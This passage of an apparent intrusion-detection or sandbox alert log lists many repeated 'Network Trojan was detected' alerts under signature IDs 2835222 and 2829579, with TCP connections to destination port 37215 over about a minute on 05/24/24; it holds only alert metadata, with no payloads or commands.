              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282808
              SID:2835222
              Source Port:54386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.401584
              SID:2829579
              Source Port:37236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.302887
              SID:2829579
              Source Port:33748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456382
              SID:2835222
              Source Port:52480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341211
              SID:2829579
              Source Port:43032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598523
              SID:2835222
              Source Port:34380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726007
              SID:2835222
              Source Port:37118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878184
              SID:2829579
              Source Port:48072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.155785
              SID:2829579
              Source Port:47310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284613
              SID:2835222
              Source Port:50592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.119497
              SID:2835222
              Source Port:39088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.796468
              SID:2835222
              Source Port:34550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340816
              SID:2829579
              Source Port:51050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542224
              SID:2829579
              Source Port:41100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574729
              SID:2835222
              Source Port:37352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449293
              SID:2829579
              Source Port:43118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.480439
              SID:2835222
              Source Port:56284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537331
              SID:2829579
              Source Port:33622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270644
              SID:2829579
              Source Port:40098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.452777
              SID:2829579
              Source Port:60042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457661
              SID:2829579
              Source Port:40554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108116
              SID:2835222
              Source Port:48150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433460
              SID:2835222
              Source Port:58880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.073857
              SID:2829579
              Source Port:55476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545001
              SID:2835222
              Source Port:44816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671658
              SID:2829579
              Source Port:43310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103292
              SID:2835222
              Source Port:52570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.976663
              SID:2829579
              Source Port:47204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.987490
              SID:2829579
              Source Port:44890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128079
              SID:2829579
              Source Port:52736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.991737
              SID:2829579
              Source Port:52362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550779
              SID:2835222
              Source Port:58052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040739
              SID:2835222
              Source Port:33324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.880288
              SID:2835222
              Source Port:41276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.994384
              SID:2829579
              Source Port:34976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.103662
              SID:2829579
              Source Port:41696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.576524
              SID:2835222
              Source Port:36848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358384
              SID:2829579
              Source Port:44312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.429732
              SID:2835222
              Source Port:50890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.195084
              SID:2829579
              Source Port:53624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111414
              SID:2835222
              Source Port:49980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395464
              SID:2835222
              Source Port:40794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.457993
              SID:2829579
              Source Port:58086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502317
              SID:2829579
              Source Port:58636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.064529
              SID:2835222
              Source Port:58782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484600
              SID:2829579
              Source Port:45502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504774
              SID:2835222
              Source Port:42990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187451
              SID:2829579
              Source Port:38156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477312
              SID:2835222
              Source Port:33672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432420
              SID:2835222
              Source Port:43338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098934
              SID:2835222
              Source Port:59852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334210
              SID:2829579
              Source Port:51322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700502
              SID:2835222
              Source Port:40436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456848
              SID:2835222
              Source Port:33872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.201183
              SID:2829579
              Source Port:43058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.117271
              SID:2835222
              Source Port:60472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446983
              SID:2835222
              Source Port:59744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.406546
              SID:2829579
              Source Port:38848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505025
              SID:2835222
              Source Port:58780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459509
              SID:2829579
              Source Port:33618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118985
              SID:2829579
              Source Port:58344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.120591
              SID:2835222
              Source Port:34538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491905
              SID:2835222
              Source Port:36228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.501937
              SID:2835222
              Source Port:39362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575088
              SID:2829579
              Source Port:41758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636793
              SID:2835222
              Source Port:57310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988752
              SID:2835222
              Source Port:41124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.253636
              SID:2829579
              Source Port:49512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.643472
              SID:2829579
              Source Port:41964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.075482
              SID:2835222
              Source Port:59990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661915
              SID:2835222
              Source Port:34256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.707794
              SID:2835222
              Source Port:35844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395495
              SID:2829579
              Source Port:44374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280023
              SID:2835222
              Source Port:42468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.199879
              SID:2829579
              Source Port:49986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.402195
              SID:2835222
              Source Port:40010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.041258
              SID:2829579
              Source Port:47502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623317
              SID:2835222
              Source Port:49440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234106
              SID:2835222
              Source Port:54690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486917
              SID:2835222
              Source Port:58090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575251
              SID:2829579
              Source Port:56854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.429606
              SID:2829579
              Source Port:41734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.201190
              SID:2829579
              Source Port:51526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625220
              SID:2829579
              Source Port:44832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.193093
              SID:2829579
              Source Port:51988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279008
              SID:2829579
              Source Port:46464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536023
              SID:2829579
              Source Port:36624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.525768
              SID:2829579
              Source Port:52350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.986379
              SID:2829579
              Source Port:60002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631281
              SID:2835222
              Source Port:42988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116070
              SID:2829579
              Source Port:55672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637681
              SID:2829579
              Source Port:56088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446897
              SID:2829579
              Source Port:35906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.633993
              SID:2835222
              Source Port:53050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103583
              SID:2829579
              Source Port:48232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.118712
              SID:2829579
              Source Port:47690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400732
              SID:2829579
              Source Port:34984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535533
              SID:2835222
              Source Port:45428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544054
              SID:2829579
              Source Port:57696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975279
              SID:2829579
              Source Port:46810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334185
              SID:2835222
              Source Port:33040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061800
              SID:2835222
              Source Port:43590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.485744
              SID:2829579
              Source Port:56704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300077
              SID:2835222
              Source Port:51178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099178
              SID:2829579
              Source Port:37190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.529841
              SID:2829579
              Source Port:39152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.355047
              SID:2829579
              Source Port:59002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.075474
              SID:2835222
              Source Port:47076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545710
              SID:2829579
              Source Port:55992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.582516
              SID:2835222
              Source Port:36858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579411
              SID:2829579
              Source Port:44030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.861868
              SID:2835222
              Source Port:49342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.701619
              SID:2829579
              Source Port:56092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.744801
              SID:2835222
              Source Port:48882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573184
              SID:2835222
              Source Port:44988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492306
              SID:2835222
              Source Port:41452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.621455
              SID:2829579
              Source Port:54182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.741811
              SID:2829579
              Source Port:60402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.169207
              SID:2829579
              Source Port:34704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.604690
              SID:2835222
              Source Port:57790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343544
              SID:2835222
              Source Port:45984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.193080
              SID:2835222
              Source Port:44006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.195186
              SID:2829579
              Source Port:47028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537057
              SID:2829579
              Source Port:48800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663692
              SID:2829579
              Source Port:48722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.584900
              SID:2829579
              Source Port:39828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.271192
              SID:2829579
              Source Port:53318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235585
              SID:2829579
              Source Port:42888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505136
              SID:2829579
              Source Port:45076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204430
              SID:2829579
              Source Port:60104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526898
              SID:2835222
              Source Port:33788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506493
              SID:2835222
              Source Port:58800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.539923
              SID:2829579
              Source Port:60450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187418
              SID:2835222
              Source Port:43252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480121
              SID:2829579
              Source Port:52078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189523
              SID:2835222
              Source Port:45546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.887004
              SID:2835222
              Source Port:35370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.426323
              SID:2829579
              Source Port:42652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833808
              SID:2835222
              Source Port:46572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542939
              SID:2829579
              Source Port:54646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188129
              SID:2829579
              Source Port:40928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870297
              SID:2835222
              Source Port:48956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575757
              SID:2835222
              Source Port:51780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055753
              SID:2829579
              Source Port:39878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308853
              SID:2835222
              Source Port:45834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.818102
              SID:2835222
              Source Port:46620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.567294
              SID:2835222
              Source Port:42342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099782
              SID:2835222
              Source Port:60476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.200751
              SID:2835222
              Source Port:35702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663551
              SID:2835222
              Source Port:44154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062866
              SID:2829579
              Source Port:42296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878309
              SID:2835222
              Source Port:40850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636542
              SID:2835222
              Source Port:47198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313367
              SID:2829579
              Source Port:47900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598167
              SID:2835222
              Source Port:46764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544147
              SID:2829579
              Source Port:35518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.489343
              SID:2829579
              Source Port:42576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801514
              SID:2829579
              Source Port:50900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576414
              SID:2835222
              Source Port:57422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334210
              SID:2835222
              Source Port:39326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099933
              SID:2829579
              Source Port:51414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395751
              SID:2835222
              Source Port:59334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430475
              SID:2829579
              Source Port:56202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623716
              SID:2835222
              Source Port:48498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.752748
              SID:2835222
              Source Port:41042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395149
              SID:2829579
              Source Port:57758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.390496
              SID:2835222
              Source Port:50768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232783
              SID:2829579
              Source Port:50426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.401553
              SID:2835222
              Source Port:54562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726110
              SID:2829579
              Source Port:46660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.119438
              SID:2835222
              Source Port:49104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.169272
              SID:2835222
              Source Port:36254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.070076
              SID:2835222
              Source Port:57398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.066287
              SID:2835222
              Source Port:59712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333997
              SID:2829579
              Source Port:42566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421624
              SID:2835222
              Source Port:49524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503831
              SID:2835222
              Source Port:35294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624829
              SID:2829579
              Source Port:42302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638022
              SID:2829579
              Source Port:55380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538195
              SID:2829579
              Source Port:52712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538167
              SID:2835222
              Source Port:33506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.067648
              SID:2829579
              Source Port:50914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.122809
              SID:2835222
              Source Port:42026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502487
              SID:2835222
              Source Port:60542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873916
              SID:2829579
              Source Port:42488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.265845
              SID:2835222
              Source Port:56514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205134
              SID:2835222
              Source Port:51052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.327826
              SID:2835222
              Source Port:33780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.492451
              SID:2829579
              Source Port:37442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154185
              SID:2835222
              Source Port:55254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456979
              SID:2835222
              Source Port:44880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575509
              SID:2835222
              Source Port:59522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975690
              SID:2835222
              Source Port:51896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.196849
              SID:2829579
              Source Port:35168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.269310
              SID:2835222
              Source Port:60490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866185
              SID:2829579
              Source Port:46488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965898
              SID:2829579
              Source Port:34756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
